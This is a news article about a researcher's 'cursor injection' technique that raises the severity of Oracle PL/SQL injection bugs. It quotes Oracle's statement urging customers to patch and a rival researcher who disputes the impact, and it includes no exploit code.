A new attack technique increases the risk of commonly found bugs in Oracle's database software, a security researcher has warned.
It was previously thought that an attacker needed high-level privileges on the database to exploit so-called PL SQL injection vulnerabilities. With a new attack technique, that's no longer true, David Litchfield, a database security expert with NGS Software, said on Thursday at the Black Hat DC event in the US.
"It is a trick that can be used by attackers with minimal privileges to gain complete control of the database server," Litchfield said in an interview. "You can use the trick through a large number of vulnerabilities that were previously thought not to be that significant."
Litchfield, who has had Oracle in his crosshairs for some time, detailed his technique, dubbed "cursor injection," in a paper that was originally published last weekend (PDF) and discussed at the event. Examples of attack code that takes advantage of the tricks have already appeared, Litchfield said.
Oracle is aware of the new attack technique, it said in a statement.
"NGS Software's 'Cursor Injection' paper describes a technique that may assist an attacker in exploitation of SQL injection vulnerabilities," the database software maker said. Oracle urges its customers to apply patches it has provided to fix known flaws.
In the past, PL SQL injection flaws often required a "create procedure" privilege on the database, which most users don't have. Using the cursor injection technique, anyone who can connect to a database can exploit such flaws, Litchfield said.
"This is achieved by injecting a pre-compiled cursor into vulnerable PL SQL objects," Litchfield wrote in his paper. "The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than 'create session.'"
In the future, Oracle should no longer list the privilege requirements as a mitigating factor of PL SQL flaws, Litchfield said. Such mitigating factors may lead Oracle customers to postpone patching, which puts them at risk, he said. "Excuses to not patch this particular flaw are now gone," Litchfield said.
But while Litchfield argues that his findings increase the severity of a large number of Oracle vulnerabilities, another prominent database security researcher disagrees.
"David's example works only if someone creates a vulnerable package with special privileges and special dynamic statements in a high-privileged account," said Alexander Kornbrust, who runs Germany's Red Database Security. "During my entire time reviewing PL SQL source code I never found such an incident, and I checked a lot of PL SQL source code from many customers and companies."
Oracle has been at loggerheads with security researchers for a couple of years. However, the company is changing and has been more candid about its product security processes. In January, Oracle started offering advance notification for its quarterly patch releases. In October, it included severity ratings for the first time.
